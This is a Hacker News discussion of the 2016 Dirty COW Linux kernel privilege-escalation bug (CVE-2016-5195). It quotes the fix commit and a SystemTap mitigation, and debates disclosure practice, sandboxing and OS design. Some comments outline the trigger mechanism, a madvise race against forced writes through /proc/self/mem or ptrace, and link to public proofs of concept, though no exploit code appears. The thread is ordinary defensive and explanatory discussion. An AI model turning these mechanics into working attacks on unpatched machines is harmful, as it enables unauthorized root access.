“Most serious” Linux privilege-escalation bug ever is under active exploit

the_duke · on Oct 20, 2016

Seems to be fixed by this commit (in 4.8.3).

commit 89eeba1594ac641a30b91942961e80fae978f839 Author: Linus Torvalds <torvalds@linux-foundation.org> Date: Thu Oct 13 13:07:36 2016 -0700

    mm: remove gup_flags FOLL_WRITE games from __get_user_pages()
    
    commit 19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 upstream.
    
    This is an ancient bug that was actually attempted to be fixed once
    (badly) by me eleven years ago in commit 4ceb5db9757a ("Fix
    get_user_pages() race for write access") but that was then undone due to
    problems on s390 by commit f33ea7f404e5 ("fix get_user_pages bug").
    
    In the meantime, the s390 situation has long been fixed, and we can now
    fix it by checking the pte_dirty() bit properly (and do it better).  The
    s390 dirty bit was implemented in abf09bed3cce ("s390/mm: implement
    software dirty bits") which made it into v3.9.  Earlier kernels will
    have to look at the page state itself.
    
    Also, the VM has become more scalable, and what used a purely
    theoretical race back then has become easier to trigger.
    
    To fix it, we introduce a new internal FOLL_COW flag to mark the "yes,
    we already did a COW" rather than play racy games with FOLL_WRITE that
    is very fundamental, and then use the pte dirty flag to validate that
    the FOLL_COW flag is still valid.

aexaey · on Oct 20, 2016

And for earlier kernel versions, there is an STAP patch:

  1) On the host, save the following in a file with the ".stp" extension:

  probe kernel.function("mem_write").call ? {
          $count = 0
  }
  probe syscall.ptrace {  // includes compat ptrace as well
          $request = 0xfff
  }

  2) Install the "systemtap" package and any required dependencies. Refer
  to the "2. Using SystemTap" chapter in the Red Hat Enterprise Linux
  "SystemTap Beginners Guide" document, available from docs.redhat.com,
  for information on installing the required -debuginfo packages.

  3) Run the "stap -g [filename-from-step-1].stp" command as root.

From https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c13

lima · on Oct 21, 2016

Nope, this only helps against one particular exploit which happens to use ptrace and /proc/self/mem.

geofft · on Oct 20, 2016

Doesn't this break Upstart (which uses ptrace for service activation), meaning you really don't want to use it on RHEL 6 or Ubuntu 14.04?

h1d · on Oct 21, 2016

Above link says, it would not work on rhel 5 and 6. Doesn't mention about 7 though.

flukus · on Oct 21, 2016

So it's been a known bug for 11 years? That sounds like a pretty serious issue with the QA and or bug tracking process.

empath75 · on Oct 21, 2016

It sounds like it wasn't realistically exploitable until recently.

tekacs · on Oct 21, 2016

Yup: http://arstechnica.co.uk/security/2016/09/linux-kernel-secur...

kasabali · on Oct 21, 2016

[flagged]

AsyncAwait · on Oct 21, 2016

The link doesn't say what you say it does. It says that Linus thinks that security researchers want to put security at the expense of usability, which is a different thing entirely.

kasabali · on Oct 21, 2016

> The link doesn't say what you say it does

First you gotta tell me what do you think I'm saying. The link may not say it but if you check the thread that link resides in you'll see it's right on topic.

The context here is set by the parent:

> That sounds like a pretty serious issue with the QA and or bug tracking process.

My comment is exactly about "bug tracking process" Linux is not known to be a friendly upstream when it comes to widely accepted security procedures like marking security vulnerabilities as such, coordinating fixes with distribution vendors etc.

> So I personally consider security bugs to be just "normal bugs". I don't cover them up, but I also don't have any reason what-so-ever to think it's a good idea to track them and announce them as something special. (http://yarchive.net/comp/linux/security_bugs.html)

Just look at the damn commit that fixes this vulnerability. It doesn't even tell it is a serious local privilege escalation. I saw the changelog for 4.4.26 yesterday and didn't realized it was an urgent security update until I saw Debian bulletin later.

> For various reasons I needed to get a round of stable kernels out sooner (http://www.mail-archive.com/linux-kernel@vger.kernel.org/msg...)

Yeah. "various reasons". There are only 2 commits and one is a huge vulnerability. In the mean time the fix (thus the vulnerability) was sitting in Linus' git tree for the last week because Linus doesn't believe in security vulnerabilities.

Whatever.

digi_owl · on Oct 21, 2016

That, and that a bug is a bug is a bug. Any bug can potentially be a security vulnerability with the right approach. Thus putting people that find such bugs on a pedestal is counterproductive.

Karunamon · on Oct 22, 2016

A bug that makes your graphics flicker is not equivalent in severity or seriousness to one that lets third parties execute code on your computer.

zAy0LfpBZLC8mAC · on Oct 23, 2016

How did you prove that it's not also a security problem? Experience shows that there are often surprising ways to abuse what seems to be a benign bug to break security of a system.

mentat · on Oct 21, 2016

Anyone who's actually operating Linux cares about security vulnerabilities more.

hhjkjhkjhhlkj · on Oct 21, 2016

Exactly which bugs are those? Linus makes valid points that people then seem to ignore and change the meaning of.

He thinks all bugs need fixing and how they are described is unimportant. Fixing the bugs is more important than how they are categorized.

mamon · on Oct 22, 2016

I would say that the bugs for which known exploits exist definitely qualify as "security bugs". Treating them as any other bugs is just plain stupid.

AsyncAwait · on Oct 21, 2016

First you gotta tell me what do you think I'm saying

> Linux developers don't believe in security vulnerabilities

kasabali · on Oct 21, 2016

https://news.ycombinator.com/item?id=12760456

hossbeast · on Oct 21, 2016

A link would be appreciated. The text is truncated at N columns on mobile.

0942v8653 · on Oct 21, 2016

https://github.com/dirtycow/dirtycow.github.io/wiki/Vulnerab... and scroll up a bit.

If you have an iPhone you can scroll horizontally even if it doesn't look like you can (though I am also annoyed by HN truncating the text)

TheSpiceIsLife · on Oct 21, 2016

The solution is for people to stop using blockquote formatting for text and reserve it for it's intended puprose of quoting code and retaining formatting.

hollander · on Oct 21, 2016

The solution is to wrap text for mobile devices. It's easy to test for screen size.

TheSpiceIsLife · on Oct 21, 2016

HN already has that, it's called

   Not doing this when you paste in a block of written material

Or just doing something like this to indicate you pasted in a block of text

"Or just using quotes"

   for chicken in chicken:
    chicken = chicken['chicken']
    chick = chicken['chicken']
    print ( chicken + '; ' + chicken )
        return "blockquoting is for code"

0xffff2 · on Oct 21, 2016

It's not that you can't scroll, it's just very tedious to scroll back and forth each and every line.

hollander · on Oct 21, 2016

And keep your eye on the line you were reading.

rodgerd · on Oct 20, 2016

> that was then undone due to problems on s390

An interesting counter-example to the idea that "more architectures expose problems that would hide in a monoculture".

nine_k · on Oct 20, 2016

Expose, not solve.

hilop · on Oct 22, 2016

This exploit is in the wild today because the fix was blocked by an obsolete hardware platform? Sigh.

ontoillogical · on Oct 21, 2016

At Appcanary, we're thinking about opening up our vulnerability database to be browsable and searchable by the public. If you're not sure which version has the patch for this vulnerability in your distro, here's what we know:

Ubuntu - https://appcanary.com/vulns/45984

Debian - https://appcanary.com/vulns/45983

Amazon Linux - https://appcanary.com/vulns/45992

Centos - no patch yet

If you found this useful, please let me know!

pmuk · on Oct 21, 2016

If you wanted to create a useful tool to promote yourselves you could make something for CentOS that allows a user to apply critical security updates only. yum-security doesn't seem to work on CentOS as the repos don't have the correct meta data. Currently that requires a satellite subscription.

JonRB · on Oct 21, 2016

That sounds like an awesome idea - and a good way of promoting yourselves!

I'll admit I spent a bit of time on your homepage thinking "the use of those birds are a bit twitter". Then I realised you're called App Canary.

ndesaulniers · on Oct 21, 2016

Do you keep track of Android releases?

edit: https://appcanary.com/vulns made my browser crawl. Please fix that page.

ontoillogical · on Oct 21, 2016

Re Android: No we don't, but I'd be interested to know what we can do with Android to be helpful to you. Send me an email (max at our domain) if you want to talk more.

vulns page: yeesh that is slow. This is the first time I'm sharing our vuln pages outside of our logged-in users, and yeah, that index is definitely not ready for public consumption yet.

microcolonel · on Oct 21, 2016

I think you just need more RAM, it's convenient having it all on one page instead of paginated.

ndesaulniers · on Oct 21, 2016

Do you know any good sites where I could download some more? ;)

Natanael_L · on Oct 22, 2016

I think there's some FPGA code somewhere to emulate external RAM...

orblivion · on Oct 21, 2016

It's sad that security information and news is so confusing as it is, but thank you for trying to improve it. I'll try to remember your site.

stass · on Oct 21, 2016

Some operating systems like FreeBSD and (I think) Debian have this functionality built in without the need for external service. So it depends on what you are using. RedHat had a similar functionality as well AFAIR.

cyphar · on Oct 21, 2016

SUSE-based distros have it as well (zypper tells you about CVE patches and how severe they are).

mfukar · on Oct 21, 2016

Are you constructing the descriptions by scraping something else?

They really need a lot of work.

rkv · on Oct 21, 2016

Please do! Great work.

tptacek · on Oct 20, 2016

It's probably the most serious Linux local privilege escalation ever.

Look, the Azimuth people have forgotten more about reliable exploit development than I have ever known, but, no, as stated, this is clearly not true. Not long ago, pretty much all local privesc bugs were practically 100% reliable.

What I think they mean to say is that this is unusually reliable for a kernel race.

I still think, though, that the right mental model to have regarding Linux privesc bugs is:

1. If there's a local privesc bug with a published exploit, assume it's 100% reliable.

2. In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.

qwertyuiop924 · on Oct 20, 2016

You said it: If you are not explicitly on the business of providing external access to your machine, the privesc isn't your problem (it's a problem, and it's bad, though), it's the fact that anybody could exploit the privesc in the first place.

throwaway2048 · on Oct 21, 2016

no, because a bug like this turns any code execution exploit into remote root...

tptacek · on Oct 21, 2016

The point is that code execution is almost always remote root, because lots of bugs like this exist. Also: most engineers overestimate the relative value of root vs. simple inside-the-VPC code execution, which is almost always gameover anyways.

patio11 · on Oct 21, 2016

Thomas has elaborated on this a few times over the years, but to elaborate for people who weren't around for those conversations: if you can make an HTTP request from inside the firewall, which probably doesn't require root, you can pivot the attack to a variety of internal services which are not designed with security in mind. That could let you e.g. reconfigure networking appliances, grab credentials to internal or external services from DevOps-y credential stores, grab all manner of business secrets, pivot to direct SQL access to the DB laundered through e.g. internal analytics dashboards or admin tooling, etc.

Senji · on Oct 20, 2016

If you are a client of such a busines you would have to care too.

qwertyuiop924 · on Oct 20, 2016

Of course you care about this sort of flaw: you need as many lines of defense as possible. But if anybody can exploit it in the first place, you've already got a major security hole.

startling · on Oct 20, 2016

> "In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.

It depends. I've seen "oh well if someone has rce they probably have root anyway" used way too many times as an excuse to avoid defense-in-depth measures.

tptacek · on Oct 20, 2016

Those people might be right. Defense in depth is a legitimate tactic, but that's all it is, and it's often an excuse for people to waste time layering stupid stuff on top of real security controls.

ASLR, NX, and CFI would be an example of a defense in depth stack that is meaningful.

SSH, Fail2Ban, and SPA would be an example of a defense in depth stack that basically just wastes time.

I would be more comfortable with a system where I knew I had to burn the box if I lost RCE on it than I would be with a system that somehow depended on RCE not coughing up kernel, and persistence, to an attacker.

The other thing defense in depth can provide is increased attacker cost. That's why there are economically valuable DRM systems (BluRay's BD+ is an example here). All you have to do is push attacker cost across a threshold (for instance with BD+, that's keeping titles secure past the new release window) to make a defense in depth control valuable.

But if someone has a kernel exploit, probably nothing you've done for defense in depth is going to meaningfully increase costs.

qwertyuiop924 · on Oct 20, 2016

> That's why there are economically valuable DRM systems (BluRay's BD+ is an example here). All you have to do is push attacker cost across a threshold (for instance with BD+, that's keeping titles secure past the new release window) to make a defense in depth control valuable.

A really good example of this is Spyro 3: The developers set up a system of overlapping checksums (which could in turn bet part of the data being checksummed by other, overlapping, checksums) so that it was virtually impossible to change even a single bit without failing the test. It was eventually cracked, as the check only ran at boot time (it required 10 seconds of disk access, and adding 10 seconds to every loading screen in the game would have been unacceptable), which meant it took over two months for pirates to get a crack working (unusual for the time). And since most game sales come in the first two months...

But that's really just me using this as an excuse to share a bit of technical trivia.

timtadh · on Oct 20, 2016

I'm confused, how is SSH an example of defense in depth? It is an access method. You should absolutely harden your SSH configuration. Fail2Ban is useless on a properly configured SSH server (no root, no passwords, no kerberos, only keys). Managing the keys at scale, well that is a different story.

I agree with you that ASLR, NX, and CFI are the most important system level defenses to employ.

Jedd · on Oct 21, 2016

> Fail2Ban is useless on a properly configured SSH server (no root, no passwords, no kerberos, only keys).

This assertion confuses me.

I use fail2ban on boxes I have key-only ssh configured for.

Are you aware fail2ban works for services other than ssh?

If an attacker / script knocks unsuccessfully on my ssh door, other doors are then closed to them.

I also get much (much!) cleaner logs thanks to fail2ban.

nixos · on Oct 21, 2016

>This assertion confuses me.

I suspect that you're confusing fail2ban and port-knocking (or using fail2ban as a port-knocker).

The point of fail2ban is to prevent an attacker from brute-forcing your server. In a key-only config, the chances of getting brute forced is smaller (by a few orders of magnitude) than getting hit by an asteroid and having the server get hit by an asteroid, so fail2ban doesn't really help.

_In theory_, the same would be true for port-knocking.

However, in practice, sshd can have security holes which a malicious scanner could exploit. And while port-knocking doesn't help against a determined attacker (it's subject to MITM, replay-attacks), it does help with defense-in-depth.

timtadh · on Oct 21, 2016

That is true and a good use case for fail2ban. Useless was probably a strong word, what I really meant was of limited utility in increasing the security of the SSH service.

tytso · on Oct 21, 2016

The main reason I use fail2ban is I got tired of the log file noise/bloat. I use key-only access on my servers already, with the key stored on a hardware token (Yubikey).

problems · on Oct 21, 2016

I guess the question then is why you're looking at failed Auth logs. Failed auths are boring, doubly so on a key only server. Successful auths are where the fun is at.

pm215 · on Oct 21, 2016

When I first set up fail2ban it was because I got annoyed that the machine on my desk was making regular "clunk...clunk...clunk" noises from the hard disk as it wrote another failed-auth attempt to the log every second or so...

tptacek · on Oct 21, 2016

SSH is fine. Stacking extra stuff on top of SSH to create a defense-in-depth stack for it SSH is what's silly. Just disable passwords and use SSH.

Karunamon · on Oct 21, 2016

Not entirely reasonable for all use cases. If there's a machine that you need access to from many different locations, a keyfile is more of a PITA than a long passphrase.

jabl · on Oct 21, 2016

A HPC center (that is, lots of users coming in via ssh) I know about disabled key logins IIRC due to some incident where an attacker had got hold of a password-less key.

Too bad that sshd can't enforce use of password-proctected keys on the server side..

dozzie · on Oct 21, 2016

You got the thing backwards. It's not "too bad that sshd can't enforce keys" of some property that happened to be missing in the key attackers got their hands on. It's "too bad the HPC center staff didn't have tools good enough to manage their servers". CFEngine and Puppet being two examples of such tools the staff missed (or didn't know how to put into use in this case).

jabl · on Oct 21, 2016

The problem, AFAIU, was that some user had a password-less key stored on some external system (their personal home computer, for all I know). That system was hacked, and allowed the attacker to access the HPC system. I don't see how the HPC center staff getting the Puppet-gospel could have prevented that person from using a password-less key. Well, except by disabling key-based logins (which, AFAIU, they could have used Puppet/cfengine/whatever for).

My point is that in general it would be better to disable password auth and only use key based auth, but only if you could somehow guarantee that the users wouldn't do crazy things like use password-less keys. But as you can't do that on the server-side, what other options do you have?

dozzie · on Oct 21, 2016

> I don't see how the HPC center staff getting the Puppet-gospel could have prevented that person from using a password-less key.

It's about reaction of the staff to key leak:

>> A HPC center [...] disabled key logins IIRC due to some incident where an attacker had got hold of a password-less key.

This reaction seems just silly.

nixos · on Oct 21, 2016

sshd can have vulnerabilities which port-knocking can (temporarily) block.

simcop2387 · on Oct 21, 2016

I know what everything else is, but what is CFI? An attempt at googling came up with results that didn't make any sense right away.

hannob · on Oct 21, 2016

Control-Flow Integrity. It's a bit of the new hotness in exploit mitigation, however it's quite complicated and there are various solutions that have different advantages and disadvantages. clang docs: http://clang.llvm.org/docs/ControlFlowIntegrity.html

tptacek · on Oct 21, 2016

Shorter CFI: when doing codegen for calls through function pointers (which will involve indirect calls through registers), emit extra code to make sure the register being jumped to is a legit function, thus breaking ROP payloads.

There's more to it, but that's the flavor of it.

startling · on Oct 21, 2016

Sure, it can go either way. But in the absence of a kernel 0-day, segregating services on the same host is useful.

AstralStorm · on Oct 21, 2016

And if a kernel 0-day is available, putting the services in a VM might help. Depending on whether an exploitable bug in the hypervisor exists.

fludlight · on Oct 20, 2016

What's a better alternative to SSH?

hilop · on Oct 22, 2016

SSH is a waste of time?

hueving · on Oct 20, 2016

>assume that code execution on your Linux systems equates to privesc

Tell this to the container community. They would have you believe containers are as secure as VMs.

mjg59 · on Oct 20, 2016

Given qemu's security track record, they're not necessarily wrong.

r3w · on Oct 21, 2016

It's always a matter of increasing attacker cost. I am not sure that attacking QEMU, then finding a privilege escalation on the host that can break out of SELinux is much easier than just staying in the VM, hopping through the internal network until you find a host that lets you do what you want.

Chances are what you want is "simply" access to a shared folder rather than root.

vbernat · on Oct 21, 2016

That's a bit unfair since:

1. Most users won't be affected by all the exploits (you don't stuff in a VM all models of network cards, SCSI controllers, etc)

2. Many deployments of QEMU (through Xen or Libvirt) are protected by AppArmor/SELinux. This would at least forbid access to /proc/self/mem but I can't say if this is enough to prevent evasion. IMO, this is likely to make the task quite harder.

pas · on Oct 21, 2016

To be fair, Docker now defaults to using AppArmor and seccomp too. And the defaults seem to be not completely toothless either (I had to "disable" seccomp to get things running multiple times. For example, you can't just ptrace() in a container.)

hueving · on Oct 21, 2016

Even if they break out of qemu, then the best case is they've reached the level of the container or user running it.

nixos · on Oct 21, 2016

Which is mostly root. Rootless containers are still not widely deployed

Diederich · on Oct 20, 2016

Citation needed.

That's certainly a goal, but I've never heard the claim.

hueving · on Oct 20, 2016

http://thenewstack.io/thirteen-ways-containers-secure-virtua...

Diederich · on Oct 21, 2016

> will emerge > thin walls

This article is very hopeful and positively worded, but at its core it acknowledges that security parity is still a work in progress.

ryuuchin · on Oct 20, 2016

Well another thing to keep in mind with this one in particular is that there is no way to mitigate it. grsecurity can't help with this kind of bug, nothing can so it may not just be about reliability of this exploit but the fact that there's no mitigation other than to update.

caf · on Oct 20, 2016

It seems like both SELinux and AppArmor could be configured to block access to /proc/self/mem which should mitigate it.

INTPenis · on Oct 21, 2016

It's sad actually that this is the perfect type of exploit to block with SElinux, a simple write to unauthorized files. But since no one uses the user contexts of selinux then no one blocks this.

Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.

So this exploit will run unconfined and will be allowed writes everywhere on the system.

I once tried the staff_r role on a Fedora 23 system and it worked out of box but there were more errors and it would not be recommended for beginners.

I believe the same goes for apparmor since apparmor only defines "armor" for processes, not for users. How many use pam_apparmor today? [1]

1. http://wiki.apparmor.net/index.php/Pam_apparmor

INTPenis · on Oct 21, 2016

>Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.

Just to clarify this, any process you start from the shell. Like the PoC exploit.

But in an actual scenario, if the exploit were launched from Firefox, or Nginx, it would run under a confined context and be prevented from overwriting most critical system files.

drieddust · on Oct 21, 2016

> Your shell runs unconfined because your user role is unconfined. Any process you might start will therefore run unconfined, unless stated otherwise in a policy.

I am actually surprised that sane and safe defaults are ignored and left to user's discretion. Most users think Linux is secure by default.

It's interesting to see Windows going into other direction and locking down more and more by default.

pjmlp · on Oct 21, 2016

Yes, it is ironic that Windows and macOS are the desktop systems taking this route, while GNU/Linux is starting to look like the swiss cheese many FOSS used to joke the other OSes for.

The scale is so high, that kernel security has become a major discussion subject.

http://arstechnica.com/security/2016/09/linux-kernel-securit...

INTPenis · on Oct 21, 2016

Well it's an ongoing effort in Fedora too. Every release of fedora or centos show some improvement around the user of SElinux.

I only wish I had the competence to help out because I think it's a very important effort.

Sad to say that in Fedora 23 I was able to easily put my user into the staff_r role, and thereby confining it. But in fedora 24 there seem to be only three default user contexts defined. Not sure what happened but that likely means I have to define my own user context and then I can't know how well supported it is in the policy.

It's impossible for ordinary users to do any of this.

Karunamon · on Oct 21, 2016

Err.. what about running SEL in permissive mode? The process works, and you'll get a nice log file filled with what would have gotten blocked.

It's invaluable in setting up new policies.

vbernat · on Oct 21, 2016

I agree. There have been far easier local exploit in the past. For example CVE-2006-2451 whose exploitation was quite simple and not using any race condition. Also CVE-2009-2692 or CVE-2010-3049. Browsing exploit-db makes it easy to find them.

problems · on Oct 21, 2016

Yup, the best solution here is to make privesc ineffective via VM isolation. Privilege escalations are rampant on most operating systems, they're not worth relying on. VM isolation breaks are much rarer.

tcoppi · on Oct 20, 2016

> 2. In almost all cases, whether or not there's a known local privesc bug, assume that code execution on your Linux systems equates to privesc; this is doubly true of machines in your prod deployment environment.

I think this goes for any mainstream OS, Linux is not particularly special here.

ams6110 · on Oct 20, 2016

So basically, if you wouldn't give a user sudo, they shouldn't have login access at all? Certainly works for some scenarios, but not practical for many others.

amalcon · on Oct 21, 2016

It depends on why you wouldn't give a user sudo. If you're worried that they might get bored and do an immature prank, or do something ill-advised (like changing the root password, or giving sudo to someone else) and render the system insecure/inoperable/unmaintainable, you probably can give them shell access. A good example here would be giving shell access to employees or the like, if their job is aided by it. The time and effort it takes to research a privesc vuln is usually sufficient to deter them, and if it isn't, you just revoke access and fire them if they do it.

If you're worried that someone might be trying to deliberately compromise your security, you can't give that person the ability to run code on your system.

empath75 · on Oct 21, 2016

the main reason you don't give users sudo is so they don't do anything stupid, not so much to prevent them from acting maliciously.

tptacek · on Oct 21, 2016

Correct.

qwertyuiop924 · on Oct 20, 2016

Assume it on any system. Even OpenBSD.

Nobody's perfect. Not even Theo.

umanwizard · on Oct 20, 2016

> FreeBSD

> Theo

Do you mean OpenBSD ?

qwertyuiop924 · on Oct 20, 2016

Why yes, yes I did. Thanks for pointing that out.

Edited to fix.

drieddust · on Oct 21, 2016

>However that's hard to do when the vast majority of kernel bugs come from vendor drivers, not the upstream Linux kernel, Stoep said.

Doesn't this actually validate Andrew Tannenbaum's argument[1] over 25 years ago when he said monolithic operating systems are inherently insecure and a rethink is required.

[1] https://groups.google.com/forum/m/?fromgroups#!topic/comp.os...

kentonv · on Oct 21, 2016

Looks like you are quoting from: http://arstechnica.com/security/2016/09/linux-kernel-securit...

While it's true that vendor drivers living in kernel space is horrible for security... that's somewhat offtopic here. This particular bug is in the memory management system, which is one of those things that kind of has to be in the kernel. A microkernel architecture seemingly would not have helped in this particular case.

snvzz · on Oct 21, 2016

> This particular bug is in the memory management system, which is one of those things that kind of has to be in the kernel.

Not really. L4 family (the post-Liedtke world) and Minix3 both have MM out of the kernel.

AstralStorm · on Oct 21, 2016

A privilege escalation in MM daemon would still allow you to write and read any user memory. Just not kernel memory or execute anything not covered by memory access capabilities. For nearly all intents and purposes, it is root.

snvzz · on Oct 22, 2016

Couple things here.

Firstly, as the MM daemon runs on its own process and is well-separated from other code, it is far easier to audit, debug and so on. Its interface is also entirely explicit. There's value in modular programming. It's far more reasonable to expect quality from such a MM daemon than the mess in a random monolith kernel.

Secondly, in seL4, physical pages are capabilities. There might be more than one MM daemon, owning separate sets of capabilities to physical pages. Security-critical memory might be managed by a MM daemon your vulnerable process has no capability to talk to.

Just my two cents.

wbl · on Oct 21, 2016

seL4 does not have these kinds of errors. By shrinking the TCB, you make it possible to do hardcore verification. The challenge is in extending to larger systems and composition.

snvzz · on Oct 21, 2016

Worth noting that as of Genode's latest release, a lot of progress has been made in that regard.

drieddust · on Oct 21, 2016

Yeah not sure what happened. Somehow I ended up looking at wrong article.

I am not very good at theory of Operating Systems but since Memory Management is separated from kernel it would have been difficult for a memory bug to impact other subsystems.

Another argument is modularity which would have allowed better testing hence lesser chances of bugs.

sheer_horror · on Oct 21, 2016

Despite your erroneous reply, you still hit 4th most upvoted comment thanks to the pro-open source sentiment here.

drieddust · on Oct 21, 2016

Yep but my argument still holds true especially in the era of IoT risks are now becoming physical. Bugs earlier used to only impact people financially, emotionally but now risks are physical.

snvzz · on Oct 21, 2016

Why do you think it is erroneous?

pjmlp · on Oct 21, 2016

While it is in part true, no amount of band-aid solutions will fix the issue of using C.

snvzz · on Oct 21, 2016

A small TCB will still be key, regardless of language.

pjmlp · on Oct 21, 2016

10% small TCB size vs 100% of the complete code.

Which one will a security minded person pick?

snvzz · on Oct 21, 2016

Sorry, can you restate that question?

I'm not sure what you're asking.

pjmlp · on Oct 21, 2016

A small TCB -> around 10% unsafe code.

C, due to arrays, strings, arithmetic operations and memory allocations requiring unsafe code leads to 100% unsafe code across the existing code.

A security minded person will pick those 10%.

snvzz · on Oct 21, 2016

> C, due to arrays, strings, arithmetic operations and memory allocations requiring unsafe code leads to 100% unsafe code across the existing code.

Imply is just slightly too harsh. Writing safe C code is very possible, as proven by projects such as seL4 or engineers such as djb.

pjmlp · on Oct 21, 2016

Those projects had to constrained themselves to having 100% of the code available, no binary libraries and lock the compiler versions being used.

Since the early 90's I keep hearing that it is possible to write safe C code, yet outside in the real world, unless constrained by processes like MISRA-C and Frama-C, which isn't really C anymore, it never works.

The proof is the amount of CVE exploits, that get reported almost daily!

Just yesterday while reading some papers on Cyclone, I discovered this jewel:

"X El Capitan v10.11.6 and Security Update 2016-004" release notes

https://support.apple.com/en-us/HT206903

From 36 bug fixes, 31 are related C memory corruption issues!

snvzz · on Oct 21, 2016

OSX is pretty bad as they go.

MACH based hybrid kernel garbage.

A shame, considering Apple actually has the resources for doing a proper rebase of XNU on L4 and with actual pure microkernel multiserver architecture.

abysmallyideal · on Oct 22, 2016

haha, that safety stuff is just training wheels. You can't delegate security. Even if you use some baby-proof "programming language", as a security engineer you still have to verify that the safety works in the condition(s) you're programming for.

pjmlp · on Oct 22, 2016

Ahah, I was doing systems programming in Pascal dialects and Modula-2 before having to know C was a requirement.

Of course one always has to validate security, but with C each line of executable line of code is a possibility exploit, which grows exponentially with the amount of developer touching the code and their respective skills and UB knowledge.

aexaey · on Oct 20, 2016

  CVE-2016-5195

  This flaw allows an attacker with a local system account to
  modify on-disk binaries, bypassing the standard permission
  mechanisms that would prevent modification without an
  appropriate permission set. This is achieved by racing the
  madvise(MADV_DONTNEED) system call while having the page of
  the executable mmapped in memory.

Excellent example why mounting partition with system binaries (such as /usr) read-only is a good idea. CoreOS does this.

[EDIT] added "read-only"

qwertyuiop924 · on Oct 20, 2016

Man, MADV_DONTNEED again? I mean, Linux's implementation is already weird (it behaves in a way counter to most other implementations of the call: you can see Bryan Cantrill's talk for the details).

What is with that call?

SysArchitect · on Oct 20, 2016

Found the lightning talk: https://youtu.be/bg6-LVCHmGM?t=3521

xzion · on Oct 20, 2016

Looking forward to a followup talk of him gloating now this bug has been reported

qwertyuiop924 · on Oct 21, 2016

I genuinely doubt he'll notice.

Bryan, if you're reading this, it's merely because I doubt that you actually check Linux bugtrackers.

Also, GNU tail provides tail -F, which does what you want tail -f to do. There is a reason for this. I don't remember what it is, but I think the manpage talks about it.

i336_ · on Oct 21, 2016

-F vs -f: -F figures out the new inode if the file is deleted (*notify are inode-based, if you see DELETE_SELF for a file you'll never get any more events)

qwertyuiop924 · on Oct 21, 2016

...which actually does handle truncation properly. For some reason.

JdeBP · on Oct 21, 2016

It's because IN_MODIFY covers both writing and truncation, so the code path for such an event has to handle both anyway.

Ironically, given that you mention M. Cantrill, GNU tail does not really handle truncation properly, and gives up for almost the very case that M. Cantrill did: when the truncation doesn't decrease the size, or is very closely followed by a write that ends up not decreasing the size.

Of course, truncation is not the best way to organize writing log files in the first place. daemontools family style log management (in cyclog, multilog, et al.) starts a fresh file whenever there is a rotation, so these problems of truncation never arise.

qwertyuiop924 · on Oct 21, 2016

What I was actually referring to was Cantrill's talk about tail -f on Solaris, and how he improved it (so that it at least handled some cases). He looked at the GNU behavior, and determined that truncation was noted, but nothing was done about it. This is true if you use -f. However, if you use -F, truncation is handled properly.

JdeBP · on Oct 23, 2016

I know what you were referring to. It has already been hyperlinked; I had already referred to where M. Cantrill explained that he gave up; and as I have just explained, the people who wrote GNU tail gave up in the same way (for much the same reasons, I expect) and GNU tail does not handle truncation any more properly than M. Cantrill did. There's no doco, but there's commentary in the code observing the problem.

And as I then went on to explain, this whole idea of truncating one log file over and over is a poor one, and not the best way to do logging in the first place. So the fact that both M. Cantrill and the GNU people gave up should perhaps be viewed as stopping when an inferior mechanism is pushed beyond its limits.

qwertyuiop924 · on Oct 23, 2016

Naturally. This is quite sensible.

The ambiguities of language sometimes make two people with the same idea think their ideas are different.

amluto · on Oct 21, 2016

I don't think you need madvise() for this bug. It's just easier to exploit that way.

kentonv · on Oct 21, 2016

As others have pointed out, mounting read-only wouldn't have helped here.

What would have helped:

* Block ptrace() syscall using seccomp.

* Don't mount /proc, or mount it read-only.

As I understand it, those steps would close all attack vectors for this bug.

FWIW, the Sandstorm.io sandbox blocks ptrace() and doesn't mount /proc at all, so I think the bug has never been exploitable by Sansdtorm apps. (Disclosure: I am the tech lead of Sandstorm.)

I think Docker now defaults to mounting /proc read-only and blocking ptrace(), so it may mitigate this vulnerability as well, but I'm not 100% sure about that.

r3w · on Oct 21, 2016

* don't let network services mmap (or even open!) random executables through mandatory access control (SELinux)

AstralStorm · on Oct 21, 2016

Ptrace is not needed for an exploit, you only need to be able to mmap a file. Does not even have to be writable.

kentonv · on Oct 21, 2016

No, it's more complicated than that. You need one process to mmap a file, and then you need a second process to be writing into the first process's address space while the first process triggers the COW. You can't do it with one process attacking itself.

amscanne · on Oct 22, 2016

No, it requires only two threads to trigger the race. Two processes are not needed.

kentonv · on Oct 25, 2016

Update: We talked to Andy Lutomirski who was involved in reverse-engineering the original exploit and tracking down the bug. He says the code path is not triggered by regular memory writes; you have to go through ptrace() or /proc/self/mem. Details in this blog post:

https://sandstorm.io/news/2016-10-25-cve-2016-5195-dirtycow-...

Of course, if you have evidence to the contrary, we'd all like to know about it!

(You are technically correct that the writes can come from another thread rather than another process, but the important part is that it has to go through one of those interfaces.)

kentonv · on Oct 22, 2016

https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c13

> Please note that this mitigation disables ptrace functionality which debuggers and programs that inspect other processes (virus scanners) use and thus these programs won't be operational.

> The in the wild exploit we are aware of doesn't work on Red Hat Enterprise Linux 5 and 6 out of the box because on one side of the race it writes to /proc/self/mem, but /proc/self/mem is not writable on Red Hat Enterprise Linux 5 and 6.

Is everyone barking up the wrong tree here?

EDIT: All of the PoCs here use ptrace() or /proc/self/mem. Why would they do that if they didn't need to?

https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs

kentonv · on Oct 25, 2016

I just talked to amluto who explained that the race can only be triggered by a write that uses the "force" flag to get_user_pages() (a kernel function). /proc/pid/mem and ptrace() do this but regular writes and process_vm_writev() do not.

ifhs · on Oct 22, 2016

Yup, you guys reinvented docker

kentonv · on Oct 22, 2016

We had this sandboxing ~2 years before Docker did, so apparently Docker reinvented Sandstorm?

(They're actually completely different products.)

startling · on Oct 20, 2016

This exploit doesn't write to disk at all. It's about modifying the in-memory datastructures that correspond to executables on disk in between when they're read and executed.

DSMan195276 · on Oct 20, 2016

